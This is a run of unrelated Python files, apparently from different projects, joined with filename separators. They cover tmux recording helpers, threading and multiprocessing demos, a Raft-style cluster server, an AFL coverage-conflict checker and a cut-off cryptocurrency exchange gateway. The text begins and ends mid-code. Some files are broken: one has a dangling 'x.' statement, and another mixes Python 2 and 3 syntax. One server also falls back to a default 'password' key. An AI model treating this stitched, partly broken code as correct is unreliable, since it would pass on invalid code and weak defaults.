self.end_session()
def end_recording(self) -> None:
self.asciinema_proc.terminate()
self.asciinema_proc.wait(timeout=5)
self.record_start = None
self.instructions = []
def end_session(self) -> None:
self.tmux_session.kill_session()
def press_key(self, keys: str, count=1, pause: typing.Optional[float] = None, target = None) -> None:
if pause is None:
pause = self.pause_between_keys
if target is None:
target = self.tmux_pane
for i in range(count):
if keys == " ":
keys = "Space"
target.send_keys(cmd=keys, enter=False, suppress_history=False)
# inspired by https://github.com/dmotz/TuringType
real_pause = random.uniform(0, pause) + 0.4 * pause
if keys == "Space":
real_pause += 1.5 * pause
elif keys == ".":
real_pause += pause
elif random.random() > 0.75:
real_pause += pause
elif random.random() > 0.95:
real_pause += 2 * pause
self.pause(real_pause)
def type(self, keys: str, pause: typing.Optional[float] = None, target = None) -> None:
if pause is None:
pause = self.pause_between_keys
if target is None:
target = self.tmux_pane
target.select_pane()
for key in keys:
self.press_key(key, pause=pause, target=target)
def exec(self, keys: str, target = None) -> None:
if target is None:
target = self.tmux_pane
self.type(keys, target=target)
self.pause(1.25)
self.press_key("Enter", target=target)
self.pause(0.5)
def focus_pane(self, pane: libtmux.Pane, set_active_pane: bool = True) -> None:
pane.select_pane()
if set_active_pane:
self.tmux_pane = pane
def pause(self, seconds: float) -> None:
time.sleep(seconds)
def run_external(self, command: str) -> None:
subprocess.run(command, shell=True)
def message(self, msg: str, duration: typing.Optional[int] = None, add_instruction: bool = True, instruction_html: str = "") -> None:
if duration is None:
duration = len(msg) * 0.08 # seconds
self.tmux_session.set_option("display-time", int(duration * 1000)) # milliseconds
self.tmux_pane.display_message(" " + msg)
if add_instruction or instruction_html:
if not instruction_html:
instruction_html = msg
self.instruction(instruction=instruction_html, duration=duration)
self.pause(duration + 0.5)
def popup(self, content: str, duration: int = 4) -> None:
# todo: check if installed tmux version supports display-popup
# tmux's display-popup is blocking, so we close it in a separate thread
t = threading.Thread(target=self.close_popup, args=[duration])
t.start()
lines = content.splitlines()
self.tmux_pane.cmd("display-popup", "", *lines)
t.join()
def close_popup(self, duration: float = 0) -> None:
self.pause(duration)
self.tmux_pane.cmd("display-popup", "-C")
def instruction(self, instruction: str, duration: float = 3, time_from: typing.Optional[float] = None) -> None:
if time_from is None:
time_from = self.current_time
self.instructions.append(InstructionSpec(
instruction = str(len(self.instructions) + 1) + ". " + instruction,
time_from = round(time_from, 1),
time_to = round(time_from + duration, 1)
))
def save_instructions(self, output_path: str) -> None:
instr_as_dicts = []
for instr in self.instructions:
instr_as_dicts.append(instr._asdict())
with open(output_path, 'w', encoding='utf-8') as f:
json.dump(instr_as_dicts, f, ensure_ascii=False, indent=4)
@property
def current_time(self) -> float:
now = time.time()
return round(now - self.record_start, 1)
@property
def current_pane(self) -> libtmux.Pane:
return self.tmux_pane
|
02_env_isolation_agent.py | #!/usr/bin/env python3
import re
import os
import sys
import copy
import pprint
import multiprocessing as mp
import radical.utils as ru
# # fuck python
# from .00_env_isolation_utils import env_read, env_diff
# from .03_env_isolation_exec import executor
eiu = __import__('00_env_isolation_utils')
eie = __import__('03_env_isolation_exec')
env_read = eiu.env_read
env_diff = eiu.env_diff
executor = eie.executor
# ------------------------------------------------------------------------------
#
# the agent may change the environment further
#
os.environ['RP_TEST'] = 'AGENT'
os.environ['RP_TEST_AGENT'] = 'True'
# run the executor which will start the task wrapper script. The executor here
# inherits the agent environment.
p = mp.Process(target=executor)
p.start()
p.join()
# at this point the task has been completed, and will have dumped the
# environment it encountered into `./env.check`. We read that env and
# compare it to the original env
env_boot = env_read('./env.boot.env')
env_check = env_read('./env.check.env')
# # some debug print for what changed in the env for the task
# only_boot, only_check, changed = env_diff(env_boot, env_check)
#
# print('------------- only env_boot')
# pprint.pprint(only_boot)
# print('------------- only env_check')
# pprint.pprint(only_check)
# print('------------- changed')
# pprint.pprint(changed)
|
EXPERIMENT.py | import concurrent.futures
import threading
import time
def sendMail(st):
time.sleep(2)
print("printing ...{}".format(st))
return "Done {}".format(st)
student = ['student1', 'student2', 'student3', 'student4']
st = ['stud1', 'stud2', 'stud3', 'stud4']
def test1():
message = "Email failed!"
with concurrent.futures.ThreadPoolExecutor() as executor:
results = [executor.submit(sendMail, st) for st in student]
def test2():
for s in student:
x = threading.Thread(target=sendMail, args=(s,))
print(x.start())
print(x.join())
x.
def test3():
x2 = threading.Thread(target=sendMail, args=(st,))
x2.start()
test2()
test3()
print("first") |
safe_bank_fine_grained.py | import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
self.lock = RLock()
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
lock1, lock2 = (
(from_account.lock, to_account.lock)
if id(from_account) < id(to_account)
else (to_account.lock, from_account.lock)
)
with lock1:
with lock2:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
transfer_lock = RLock()
def do_transfer_global_style(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
with transfer_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
# with transfer_lock:
# current = sum(a.balance for a in accounts)
[a.lock.acquire() for a in accounts]
current = sum(a.balance for a in accounts)
[a.lock.release() for a in accounts]
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print("All good: Consistent account balance: ${:,}".format(total), flush=True)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
push_server.py | #!/usr/bin/python3
def main(config_fname=None):
import asyncio
import socket
import time
import dill
import tornado.httpserver
import tornado.web
from pysyncobj import SyncObj, SyncObjConsumer
from pysyncobj import SyncObjConf
from pushpy.batteries import ReplLockDataManager
from pushpy.code_store import load_in_memory_module, create_in_memory_module
from pushpy.host_resources import HostResources, GPUResources, get_cluster_info, get_partition_info
from pushpy.push_manager import PushManager
from pushpy.push_server_utils import load_config, serve_forever, host_to_address
if config_fname is None:
import sys
config_fname = sys.argv[1]
config = load_config(config_fname)
config_bootstrap = config['bootstrap']
config_manager = config['manager']
manager_auth_key = (config_manager.get('auth_key') or 'password').encode('utf8')
base_host = config.get('hostname') or socket.gethostname()
if 'manager_host' in config_bootstrap:
bootstrap_manager_host = config_bootstrap['manager_host']
print(f"bootstrapping config from {bootstrap_manager_host} {manager_auth_key}")
bootstrap_manager = PushManager(address=host_to_address(bootstrap_manager_host), authkey=manager_auth_key)
bootstrap_manager.connect()
bootstrap_primary = bootstrap_manager.bootstrap_peer()
peer_config = bootstrap_primary.get_config(base_host, default_base_port=10000)
sync_obj_port = peer_config['base_port']
sync_obj_peers = peer_config['sync_obj_config']['peers']
sync_obj_password = peer_config['sync_obj_config']['password']
boot_src = dill.loads(peer_config['boot_src'])
boot_mod, _ = load_in_memory_module(boot_src, name="boot_mod")
else:
bootstrap_primary = None
boot_source_uri = config_bootstrap['boot_source_uri']
boot_mod, boot_src = load_in_memory_module(boot_source_uri, name="boot_mod")
config_sync_obj = config['sync_obj']
sync_obj_port = int(config_sync_obj.get('port') or 10000)
sync_obj_peers = config_sync_obj.get('peers') or []
sync_obj_password = config_sync_obj['password'].encode('utf-8') if 'password' in config_sync_obj else None
manager_port = int(config_manager.get('port') or (sync_obj_port % 1000) + 50000)
web_port = int((config.get('web') or {}).get('port') or (sync_obj_port % 1000) + 11000)
sync_obj_host = f"{base_host}:{sync_obj_port}"
manager_host = f"{base_host}:{manager_port}"
print(f"sync_obj_host: {sync_obj_host} peers:{sync_obj_peers}")
print(f"manager_host: {manager_host}")
class DoRegistry:
def apply(self):
return list(PushManager._registry.keys())
repl_hosts = ReplLockDataManager(autoUnlockTime=5)
boot_globals, web_router = boot_mod.main()
boot_consumers = [x for x in boot_globals.values() if isinstance(x, SyncObjConsumer) or hasattr(x, '_consumer')]
drop_connections_list = []
def on_state_change(oldState, newState):
print(f"on_state_change: {oldState} {newState}")
if newState == 2:
for o in sync_obj.otherNodes:
if not sync_obj.isNodeConnected(o):
# print(f"removing disconnected node: {o.address}")
# sync_obj.removeNodeFromCluster("127.0.0.1:10000")
drop_connections_list.append(o)
def drop_disconnected_peers():
# sync_obj.removeOnTickCallback(drop_disconnected_peers)
while(True):
if sync_obj._isLeader():
while len(drop_connections_list) > 0:
o = drop_connections_list.pop()
if not sync_obj.isNodeConnected(o):
print(f"removing disconnected node: {o.address}")
sync_obj.removeNodeFromCluster(o.id)
time.sleep(1)
sync_config = SyncObjConf(dynamicMembershipChange=True, onStateChanged=on_state_change)
# sync_config.appendEntriesBatchSizeBytes = 2**27
# sync_config.journalFile = f'./logs/{sync_obj_host}.journal'
# sync_config.fullDumpFile = f'./logs/{sync_obj_host}.dump'
sync_obj = SyncObj(sync_obj_host, sync_obj_peers, consumers=[repl_hosts, *boot_consumers], conf=sync_config)
# sync_obj.addOnTickCallback(drop_disconnected_peers)
import threading
thread = threading.Thread(target=drop_disconnected_peers, daemon=True)
thread.start()
if bootstrap_primary is not None:
print(f"adding self to cluster {sync_obj_host}")
bootstrap_primary.apply(sync_obj_host)
class DoBootstrapPeer:
def get_host_map(self, hosts):
print(hosts)
host_port_map = dict()
for host in hosts:
h, p = host.address.split(":")
arr = host_port_map.get(h)
if arr is None:
arr = []
host_port_map[h] = arr
arr.append(int(p))
print(host_port_map)
return host_port_map
def get_config(self, hostname, default_base_port):
connected_peers = [o for o in sync_obj.otherNodes if sync_obj.isNodeConnected(o)]
hosts = [sync_obj.selfNode, *connected_peers]
host_port_map = self.get_host_map(hosts)
host_ports = host_port_map.get(hostname, [])
host_port = default_base_port + 1
while host_port in host_ports:
print(host_port, host_ports)
host_port += 1
return {
"base_port": host_port,
"sync_obj_config": {
'peers': [x.address for x in hosts],
'password': sync_obj_password
},
"boot_src": dill.dumps(boot_src)
}
def apply(self, peer_address):
print(f"adding node to cluster: {peer_address}")
sync_obj.addNodeToCluster(peer_address)
l_get_cluster_info = lambda: get_cluster_info(repl_hosts)
l_get_partition_info = lambda: get_partition_info(repl_hosts, sync_obj)
host_resources = HostResources.create(host_id=sync_obj.selfNode.id, mgr_host=manager_host)
# override GPU presence if desired
gpu_count = (((config.get('host_resources') or {}).get('gpu')) or {}).get('count')
if gpu_count is not None:
host_resources.gpu = GPUResources(count=gpu_count)
boot_globals['host_id'] = host_resources.host_id
boot_globals['get_cluster_info'] = l_get_cluster_info
boot_globals['get_partition_info'] = l_get_partition_info
boot_globals['host_resources'] = host_resources
PushManager.register('sync_obj', callable=lambda: sync_obj)
PushManager.register('bootstrap_peer', callable=lambda: DoBootstrapPeer())
PushManager.register('get_registry', callable=lambda: DoRegistry())
PushManager.register("get_cluster_info", callable=lambda: l_get_cluster_info)
PushManager.register("get_partition_info", callable=lambda: l_get_partition_info)
PushManager.register("host_resources", callable=lambda: host_resources)
boot_common = create_in_memory_module(name="boot_common")
for k, v in boot_globals.items():
boot_common.__dict__[k] = v
if k.startswith("repl_") or k.startswith("local_"):
# https://stackoverflow.com/questions/2295290/what-do-lambda-function-closures-capture
PushManager.register(k, callable=lambda vv=v: vv)
print(f"registering host: {sync_obj.selfNode.id}")
sync_obj.waitReady()
print(f"bind complete: {sync_obj.selfNode.id}")
while not repl_hosts.tryAcquire(sync_obj.selfNode.id, data=host_resources, sync=True):
print(f"connecting to cluster...")
time.sleep(0.1)
m = PushManager(address=host_to_address(manager_host), authkey=manager_auth_key)
mgmt_server = m.get_server()
mt = serve_forever(mgmt_server)
if web_router is None:
mt.join()
else:
webserver = tornado.httpserver.HTTPServer(web_router)
print(f"starting webserver @ {web_port}")
webserver.listen(web_port)
# use asyncio to drive tornado so that async io can be used in web handlers
loop = asyncio.get_event_loop()
try:
loop.run_forever()
finally:
loop.run_until_complete(loop.shutdown_asyncgens())
loop.close()
print(f"stopping")
if __name__ == "__main__":
import sys
main(sys.argv[1])
|
multiprocessing_test.py | import multiprocessing
# from https://docs.python.org/2/library/multiprocessing.html
def f(x):
return x*x
if __name__ == '__main__':
p = multiprocessing.Pool(5)
print(p.map(f, [1, 2, 3]))
def f(name):
print 'hello', name
if __name__ == '__main__':
p = multiprocessing.Process(target=f, args=('bob',))
p.start()
p.join()
print p.exitcode
def f(q):
q.put([42, None, 'hello'])
if __name__ == '__main__':
q = multiprocessing.Queue()
p = multiprocessing.Process(target=f, args=(q,))
p.start()
print q.get() # prints "[42, None, 'hello']"
p.join()
print p.exitcode
print "done"
|
app.py | # Press the green button in the gutter to run the script.
import os
import sys
import threading
import time
import logging
from arm_prosthesis.external_communication.core.communication import Communication
from arm_prosthesis.external_communication.services.telemetry_service import TelemetryService
from arm_prosthesis.hand_controller import HandController
from arm_prosthesis.config.configuration import load_config
from arm_prosthesis.services.mio_patterns_service import MioPatternsService
from arm_prosthesis.services.myoelectronics_service import MyoelectronicsService
from arm_prosthesis.services.gesture_repository import GestureRepository
from arm_prosthesis.services.motor_driver_communication import ActuatorControllerService
from arm_prosthesis.services.settings_dao import SettingsDao
class App:
def __init__(self):
self._config = load_config('/home/pi/arm-prosthesis/arm_prosthesis/config/config.ini')
self.init_logger()
self._logger = logging.getLogger('Main')
self._logger.info('Logger init. Start app.')
self._logger.info(f'App settings:\n{self._config}')
self._settings_dao = SettingsDao(self._config.settings_path)
self._logger.info(f'Prosthesis settings:\n{self._settings_dao.get()}')
self._driver_communication = ActuatorControllerService()
self._hand = HandController(self._driver_communication)
self._gesture_repository = GestureRepository(self._config.gestures_path)
self._telemetry_service = TelemetryService(self._gesture_repository, self._driver_communication)
self._myoelectronics_service = MyoelectronicsService(self._config.model_path)
self._mio_patterns_service = MioPatternsService(self._config.patterns_path)
# be sure to refactor, remove the god class
self._communication = Communication(self._hand, self._config, self._gesture_repository, self._telemetry_service,
self._settings_dao, self._myoelectronics_service,
self._driver_communication,
self._mio_patterns_service)
self._driver_communication_thread = threading.Thread(target=self._driver_communication.run)
self._communication_thread = threading.Thread(target=self._communication.run)
self._hand_controller_thread = threading.Thread(target=self._hand.run)
def run(self):
self._logger.info('App start init workers.')
self._driver_communication_thread.start()
self._communication_thread.start()
self._hand_controller_thread.start()
if self._settings_dao.get().enable_emg:
self._myoelectronics_service.start()
self._logger.info('App started.')
self._hand_controller_thread.join()
self._logger.info('App closed.')
def init_logger(self):
session_name = time.strftime("%Y_%m_%d_%H_%M_%S")
stdout_handler = logging.StreamHandler(sys.stdout)
handlers = [stdout_handler]
if self._config.log_to_file:
if os.path.isdir(self._config.path_to_log) is False:
os.makedirs(self._config.path_to_log)
log_file = self._config.path_to_log + '/' + session_name + '.log'
print("Log file is: " + log_file)
file_handler = logging.FileHandler(filename=log_file)
handlers.append(file_handler)
logging.basicConfig(
level=logging.INFO,
format='%(asctime)s %(levelname)-8s [%(threadName)s] [%(filename)s:%(lineno)d] %(message)s',
handlers=handlers
)
if __name__ == '__main__':
app = App()
app.run()
|
main.py | #!/usr/bin/env python3
import sys
import click
import os
import time
import math
import traceback
import threading
import json
import socket
from datetime import datetime
from datetime import timedelta
from marie47esp32.webserver.webserver import WebServer
from marie47esp32.util.log import log
from marie47esp32.util.config import Config
from marie47esp32.udp.udpserver import UdpServer
import asyncio
import tornado.web
import tornado.websocket
from pickle import FALSE
def millis(start, end):
diff = end-start
return (diff.days*24*60*60+diff.seconds)*1000+diff.microseconds/1000.0
ws = WebServer()
def start_tornado(port):
asyncio.set_event_loop(asyncio.new_event_loop())
ws.run(port=port)
## TORNADO END
def main():
log.debug('marie47esp32: starting...')
# load config
configpath="."
config = Config.getSingleton()
config.init(configpath)
t = threading.Thread(target=start_tornado, args=[config.getInt("webserverport")])
t.daemon = True
t.start()
UDP_PORT = config.getInt("udpserverport")
UdpServer.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
UdpServer.sock.bind(('', UDP_PORT)) # specify UDP_IP or INADDR_ANY
while(True):
try:
udpdata, addr = UdpServer.sock.recvfrom(4096) # buffer size is 1024 bytes
UdpServer.handle_udp_paket(udpdata, addr)
except Exception as e:
log.warn('main: an exception occured! ignoring!')
traceback.print_exc()
log.debug('main: exiting.')
if __name__ == "__main__":
sys.exit(main())
|
check_hit_new.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
''' check hash conflict '''
import tempfile
from multiprocessing import Process
import os
import traceback
import sys
from utils import run_command_noret
MAP_SIZE_INDEX = 16
TRACE_EDGES = set()
class DynamicAnalyzer(object):
def __init__(self):
""" init """
self._fifo_name = ''
self._tmpdir = ''
def parse_trace(self):
""" read from fifo and parse into dictionary """
current = '' # current basic block being parsed
previous = '0' # previous basic block beding parsed
edge_count = 0
uniq_count = 0
with open(self._fifo_name, 'r') as fifo:
for line in fifo:
if line[6] == '4':
continue
# process traceed tbs
current = line.split(':')[0]
parse_edge = (previous, current)
edge_count += 1
if not parse_edge in TRACE_EDGES:
TRACE_EDGES.add(parse_edge)
uniq_count += 1
previous = current
def mkfifo(self, fifo=None):
""" create FIFO """
if fifo is None:
fifo = 'fifo'
self._tmpdir = tempfile.mkdtemp()
self._fifo_name = os.path.join(self._tmpdir, fifo)
# print self._fifo_name
try:
os.mkfifo(self._fifo_name)
except OSError as excp:
traceback.print_exc()
os.rmdir(self._tmpdir)
print "Failed to create FIFO"
print getattr(excp, 'message', repr(excp))
raise excp
def analyze_dynamic(self, test_input):
""" analyze the dynamic translation block coverage with qemu """
# Execute binary with qemu user mode while taking care of libraries
# collect dynamic translation block execution information
# 1. create a named pipe for qemu to write to
self.mkfifo()
# 2. build command and launch QEMU
# cmd = self.build_qemu_cmd(test_input)
cmdfile = open('command_file', 'r')
run_cmd = cmdfile.readline()
if '|' in run_cmd:
cmd = run_cmd.format(test_input, self._fifo_name)
else:
cmd = run_cmd.format(self._fifo_name, test_input)
print cmd
process = Process(target=run_command_noret, args=[cmd, 120])
process.start()
# 3. read from fifo after QEMU finished executing
try:
self.parse_trace()
except Exception as e:
traceback.print_exc()
print 'error when parsing qemu trace'
print getattr(e, 'message', repr(e))
raise e
finally:
os.remove(self._fifo_name)
os.rmdir(self._tmpdir)
edge_map = set()
full_map = dict()
actual_map = dict()
queue_dir = sys.argv[1]
#print queue_dir
start_address = sys.argv[3]
# load the queue data
if queue_dir == 'FILE':
edge_map = set(tuple(line.strip().split(',')) for line in open('edge_file','r'))
TRACE_EDGES.update(edge_map)
else:
for root, dirs, files in os.walk(queue_dir):
for f in files:
full_path= '{}/{}'.format(root, f)
analyzer = DynamicAnalyzer()
analyzer.analyze_dynamic(full_path)
edge_map.update(TRACE_EDGES)
# no ".state" dir
break
# save the edges into file
edge_file = open('edge_file', 'w')
for edge in edge_map:
edge_file.write(edge[0]+','+edge[1]+'\n')
print len(edge_map)
# analyse the target testcase trace
test_case_dir = sys.argv[2]
for root, dirs, files in os.walk(test_case_dir):
for f in files:
full_path= '{}/{}'.format(root, f)
analyzer = DynamicAnalyzer()
analyzer.analyze_dynamic(full_path)
# Step1: is there any new edge?
print "> Step1: is there any new edge?"
new_edges = TRACE_EDGES - edge_map
num_new_edges = len(new_edges)
if num_new_edges == 0:
print "no new edges"
print "Yes! {} new edges found.".format(num_new_edges)
for edge in sorted(new_edges):
print edge
print
# Step2: is the bitmap value causing conflicts?
print "> Step2: is the bitmap value causing conflicts?"
same_hit = 1
for edge in edge_map:
prev = int(edge[0], 16)
cur = int(edge[1], 16)
value = ((cur >> 4)^(cur << 8)) ^ (((prev >> 4)^(prev << 8)) >> 1)
if value in full_map:
full_map[value].append(edge)
else:
full_map[value] = [edge,]
for edge in new_edges:
print edge
print '......',
prev = int(edge[0], 16)
cur = int(edge[1], 16)
value = ((cur >> 4)^(cur << 8)) ^ (((prev >> 4)^(prev << 8)) >> 1)
print hex(value)
if value in full_map:
print "Confilct found: ", hex(value), full_map[value]
else:
print "No conflict"
same_hit = 0
print "---------------------------------------------------------------------------------------------------------------"
if same_hit:
print "All the new edges caused location conflicts in bitmap, it is hard to sync this testcase."
else:
print "Looks good, continue..."
print
# Step3: is the bitmap value causing conflicts?
print "> Step3: is the actual bitmap causing conflicts? [MAP_SIZE: 2**{}]".format(MAP_SIZE_INDEX)
MAP_SIZE = 2**MAP_SIZE_INDEX
should_in = 0
for edge in edge_map:
prev = int(edge[0], 16)
cur = int(edge[1], 16)
value = ((cur >> 4)^(cur << 8))
value &= (MAP_SIZE - 1)
value ^= ((((prev >> 4)^(prev << 8)) & (MAP_SIZE - 1)) >> 1)
if value in actual_map:
actual_map[value].append(edge)
else:
actual_map[value] = [edge,]
start_fill = int(start_address, 16)
my_edges = {}
my_edge_end = []
my_edge_end.append(start_fill)
for edge in sorted(new_edges):
print edge
print '......',
prev = int(edge[0], 16)
cur = int(edge[1], 16)
value = ((cur >> 4)^(cur << 8))
value &= (MAP_SIZE - 1)
value ^= ((((prev >> 4)^(prev << 8)) & (MAP_SIZE - 1)) >> 1)
print hex(value)
edge_found = 0
fill_prev = my_edge_end[-1]
fill_cur_start = my_edge_end[0] + 10
print hex(fill_prev), hex(fill_cur_start)
while edge_found != 1:
fill_value = ((fill_cur_start >> 4)^(fill_cur_start << 8))
fill_value &= (MAP_SIZE - 1)
fill_value ^= ((((fill_prev >> 4)^(fill_prev << 8)) & (MAP_SIZE - 1)) >> 1)
if fill_value == value:
print "Recommend edge: [{}, {}], index value is {}".format(hex(fill_prev), hex(fill_cur_start), hex(fill_value))
my_edges[fill_prev] = fill_cur_start
my_edge_end.append(fill_cur_start)
edge_found = 1
break
fill_cur_start += 1
if value in actual_map:
print "Confilct found in location {}: existing edges:{}".format(hex(value), actual_map[value])
else:
print "No conflict"
should_in = 1
print "---------------------------------------------------------------------------------------------------------------"
if should_in:
print "The testcase looks very interesting!"
else:
print "All the new edges caused conflicts, please try changing the `MAP_SIZE` in afl"
|
okcoinGateway.py | # encoding: UTF-8
'''
vn.okcoin的gateway接入
注意:
1. 前仅支持USD和CNY的现货交易,USD的期货合约交易暂不支持
'''
import os
import json
import logging
from datetime import datetime
from time import sleep
from copy import copy, deepcopy
from threading import Condition
from Queue import Queue
from threading import Thread
from time import sleep
from operator import itemgetter
from itertools import *
from okcoin.vnokcoin import OkCoinApi,OKCOIN_USD
from vtGateway import *
from vtFunction import getJsonPath
# 价格类型映射
priceTypeMap = {}
priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE)
priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE)
priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE)
priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE)
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# 方向类型映射
directionMap = {}
directionMapReverse = {v: k for k, v in directionMap.items()}
# 委托状态印射
statusMap = {}
statusMap[-1] = STATUS_CANCELLED
statusMap[0] = STATUS_NOTTRADED
statusMap[1] = STATUS_PARTTRADED
statusMap[2] = STATUS_ALLTRADED
statusMap[4] = STATUS_UNKNOWN
############################################
## 交易合约代码
############################################
SYMBOL = ['ace', 'act', 'amm', 'ark', 'ast', 'avt', 'bnt', 'btm', 'cmt', 'ctr',
'cvc', 'dash', 'dat', 'dgb', 'dgd', 'dnt', 'dpy', 'edo', 'elf', 'eng',
'eos', 'etc', 'evx', 'fun', 'gas', 'gnt', 'gnx', 'hsr', 'icn', 'icx',
'iota', 'itc', 'kcash', 'knc', 'link', 'lrc', 'ltc', 'mana', 'mco',
'mda', 'mdt', 'mth', 'nas', 'neo', 'nuls', 'oax', 'omg', 'pay',
'ppt', 'pro', 'qtum', 'qvt', 'rcn', 'rdn', 'read', 'req', 'rnt', 'salt',
'san', 'sngls', 'snm', 'snt', 'ssc', 'storj', 'sub', 'swftc',
'tnb', 'trx', 'ugc', 'ukg', 'vee', 'wrc', 'wtc', 'xem', 'xlm', 'xmr',
'xrp', 'xuc', 'yoyo', 'zec', 'zrx', '1st']
############################################
# logging.basicConfig(level=logging.DEBUG,
# format='%(asctime)s %(levelname)s %(message)s',
# datefmt='%a, %d %b %Y %H:%M:%S',
# filename='/root/vn.okex/vnpy/trader/gateway/okcoinGateway/log',
# filemode='a')
########################################################################
class OkcoinGateway(VtGateway):
"""OkCoin接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, coins, gatewayName='OKCOIN'):
"""Constructor"""
super(OkcoinGateway, self).__init__(eventEngine, gatewayName)
self.coins = coins
self.api = Api(self)
self.leverage = 0
self.connected = False
self.qryEnabled = False
self.fileName = self.gatewayName + '_connect.json'
self.filePath = getJsonPath(self.fileName, __file__)
self.registeHandle()
self.tradeSymbols = []
self.tradeTest = True
self.coin2tradeSymbols()
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
try:
f = file(self.filePath)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
host = str(setting['host'])
apiKey = str(setting['apiKey'])
secretKey = str(setting['secretKey'])
trace = setting['trace']
leverage = setting['leverage']
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
# 初始化接口
self.leverage = leverage
# if host == 'CNY':
# host = vnokcoin.OKCOIN_CNY
# else:
# host = vnokcoin.OKCOIN_USD
host = OKCOIN_USD
self.api.active = True
self.api.connect(host, apiKey, secretKey, trace)
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'接口初始化成功'
self.onLog(log)
# 启动查询
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def coin2tradeSymbols(self):
"""币种转换成合约代码"""
c = ['btc', self.coins, 'eth']
self.tradeSymbols = ['_'.join((c[1], c[0])),
'_'.join((c[1], c[2])),
'eth_btc']
#----------------------------------------------------------------------
def login(self):
"""订阅订单回报"""
return self.api.login()
#----------------------------------------------------------------------
def subscribe(self):
"""订阅行情"""
for coin in SYMBOL[:10]:
bs = coin + '_btc'
es = coin + '_eth'
self.api.subscribeSpotDepth(bs, '5')
self.api.subscribeSpotDepth(es, '5')
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.api.spotSendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.spotCancel(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.api.spotUserInfo()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.active = False
self.api.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount]
# self.qryFunctionList = [self.tradePolicy]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
# ----------------------------------------------------------------------
def pTick(self, event):
tick = event.dict_['data']
self.tradePolicy()
# if tick.symbol == 'mco_btc':
# print '========tick============='
# print tick.symbol
# print tick.askPrice1
# print tick.askVolume1
# print tick.bidPrice1
# print tick.bidVolume1
# if self.tradeTest:
# req = VtOrderReq()
# req.symbol = tick.symbol
# req.priceType = 'sell'
# req.price = tick.bidPrice1
# req.volume = 0.09
# self.sendOrder(req)
# print 'send order!'
# self.tradeTest = False
# ----------------------------------------------------------------------
def pAccount(self, event):
account = event.dict_['data']
# print '=======account========'
# print self.api.account
# ----------------------------------------------------------------------
def pOrder(self, event):
order = event.dict_['data']
# print '=======order========'
# print order.symbol
# print order.orderID
# print order.status
# ----------------------------------------------------------------------
def pBalance(self, event):
balance = event.dict_['data']
# print '=======balance========'
# print self.api.account
# ----------------------------------------------------------------------
def pLog(self, event):
log = event.dict_['data']
loginfo = ':'.join([log.logTime, log.logContent])
# send_msg(loginfo)
self.today = datetime.now().date().strftime('%Y-%m-%d')
filename = config.basePath + 'myctp/vn.trader/ctpGateway/log/%s' % ('tradeLog' + '-' + self.today + '.txt')
if os.path.exists(filename):
